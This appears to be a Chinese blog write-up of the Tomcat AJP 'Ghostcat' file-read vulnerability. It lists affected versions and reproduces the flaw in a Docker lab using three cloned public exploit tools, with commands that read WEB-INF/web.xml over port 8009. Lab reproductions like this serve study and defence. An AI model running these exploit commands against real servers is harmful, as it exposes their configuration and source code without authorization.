Tomcat AJP协议文件读取漏洞
漏洞描述:
Tomcat在 server.xml中配置了两种连接器:
1.HTTP Connector:监听8080端口,负责建立HTTP连接。在通过浏览器访问Tomcat服务器的Web应用时,使用的就是这个连接器。
2.AJP Connector:监听8009端口,负责和其他的HTTP服务器建立连接,通过AJP协议和另一个Web容器进行交互。
漏洞利用条件:
Tomcat服务器8009端口上的AJP协议存在漏洞,攻击者可利用该漏洞读取或包含Tomcat上所有webapp目录下的任意文件,如:webapp配置文件或源代码等
漏洞影响范围:
Apache Tomcat 6
Apache Tomcat 7 < 7.0.100
Apache Tomcat 8 < 8.5.51
Apache Tomcat 9 < 9.0.31
漏洞复现:
靶场的搭建:
1、Docker部署环境,搜索受影响的tomcat镜像
~# docker search tomcat-8.5
~# docker pull duonghuuphuc/tomcat-8.5.32
2、拉取完成后运行,并通过浏览器访问:
~# docker run -d -p 8080:8080 -p 8009:8009 duonghuuphuc/tomcat-8.5.32
3、漏洞利用:
EXP1:AjpShooter:git clone https://github.com/00theway/Ghostcat-CNVD-2020-10487.git
python ajpShooter.py http://<靶场IP> 8009 WEB-INF/web.xml read
EXP2:Ghostcat:git clone git clone https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
python CNVD-2020-10487-Tomcat-Ajp-lfi.py <目标ip> -p <ajp端口> -f <读取文件>
EXP3:AJPy:git clone https://github.com/hypn0s/AJPy
版本探测:python tomcat.py --port <port> version <IP>
文件读取:python tomcat.py read_file --webapp=manager /WEB-INF/web.xml <地址>
Tomcat AJP协议文件读取漏洞相关推荐
- 修改服务器的AJP监听地址,实习记录(五) - AJP协议文件读取漏洞
漏洞介绍 Tomcat在 server.xml中配置了两种连接器:HTTP Connector:监听8080端口,负责建立HTTP连接.在通过浏览器访问Tomcat服务器的Web应用时,使用的就是这个 ...
- 2-java安全——tomcat AJP协议文件包含分析[CVE-2020-1938]
漏洞描述: tomcat是Apache组织开发的中小型的JavaEE服务器,它实现了servlet,JSP等javaEE规范,可以提供web资源访问服务,tomcat主要提供了两种通信方式访问web资 ...
- tomcat ajp协议安全限制绕过漏洞_Apache Tomcat文件包含漏洞(CVE20201938)复现
一.漏洞背景2020年02月20日,国家信息安全漏洞共享平台(CNVD)发布了关于Apache Tomcat文件包含漏洞(CVE-2020-1938/CNVD-2020-10487)的安全公告.Tom ...
- tomcat ajp协议安全限制绕过漏洞_Apache tomcat 文件包含漏洞复现(CVE20201938)
漏洞背景 Tomcat是由Apache软件基金会下属的Jakarta项目开发的一个Servlet容器,按照Sun Microsystems提供的技术规范,实现了对Servlet和JavaServer ...
- tomcat ajp协议安全限制绕过漏洞_国家信息安全漏洞共享平台发布Apache Tomcat漏洞安全公告...
2月22日消息 国家信息安全漏洞共享平台(CNVD)近日发布了一份关于 Apache Tomcat 存在文件包含漏洞的安全公告,具体如下: 安全公告编号:CNTA-2020-0004 2020 年 1 ...
- [CNVD-2020-10487/CVE-2020-1938]: Tomcat AJP协议漏洞
环境搭建 下载存在漏洞版本8.5.50: https://archive.apache.org/dist/tomcat/tomcat-8/v8.5.50/bin/apache-tomcat-8.5.5 ...
- Tomcat- AJP协议文件读取/命令执行漏洞(CVE-2020-1938 / CNVD-2020-10487)
CVE-2020-1938 1.概述 1.1 tomcat概述 1.2 gostcat概述 - 漏洞概述 2. 漏洞成因 2.1 前置基础 2.1.1 Tomcat Connector(连接器) 2. ...
- 网络抓包方式复现Tomcat- AJP协议文件读取/命令执行漏洞(CVE-2020-1938 / CNVD-2020-10487)
目录 测试是否安装成功编辑 基础简介 Tomcat Connector(连接器) 编辑Servlet(服务程序) Tomcat内部处理请求流程 文件读取漏洞 抓包复现 需要将下图中抓取到的数据包修 ...
- springboot需要tomcat服务器吗_嵌入式 Tomcat AJP 协议对 SpringBoot 应用的影响
前言 2020 年 1 月 6 日,国家信息安全漏洞共享平台(CNVD)收录了由北京长亭科技有限公司发现并报送的 Apache Tomcat 文件包含漏洞.Tomcat AJP 协议由于存在实现缺陷导 ...
最新文章
- 区块链赚钱的9种方式
- TypeError: the JSON object must be str, bytes or bytearray, not dict
- BrainNet:脑-脑接口用于人与人之间直接协作
- python xpath语法-Python爬虫——bs4、xpath基本语法
- php把时间变成整数,php怎么将字符串转为整数
- 在MacBook上Jupyter安装
- C#中double.tostring()的用法
- Hive 之collect_list/collect_set(列转行)
- android c 内存泄露,内存泄漏弄个明白
- 降本增效利器!趣头条 Spark Remote Shuffle Service 最佳实践
- java 改变窗口颜色_java窗口背景颜色设置
- VMware vSphere 6 序列号大全
- js实现省市名称简称 ,echarts全国地图省市名称简称
- 微信群二维码活码生成管理系统源码
- 邓仰东专栏|机器学习的那些事儿(二):机器学习简史
- flex:1 代表了什么意思
- vs2005+sql2005的新一天
- 抽奖系统的实现(两种)
- Qt在VS中的使用方法详解
- xml开发笔记(一):tinyXml2库介绍、编译和工程模板
热门文章
- non-Boost Asio 笔记: UDP UART SocketCAN Multicast UDS
- Python处理连接超时方法
- 丰润达S400来了!5.8G千兆无线网桥“横空出世”
- 在Pycharm中使用append()方法对列表添加元素时提示“This list creation could be rewritten as a list literal“的解决方法
- 刚刚,常温常压超导首被证明理论可行:美顶尖实验室论文出炉
- 菜鸟教程python3在线工具_3个非常实用的Python爬虫工具,你会几个?
- 李笑来——最重要的能力(阅读总结)
- 如何一次性地把WORD所有二级标题全部改为三级标题?
- ECG - ADS1298 使用笔记(1)- 芯片简介
- audioread.exceptions.NoBackendError in librosa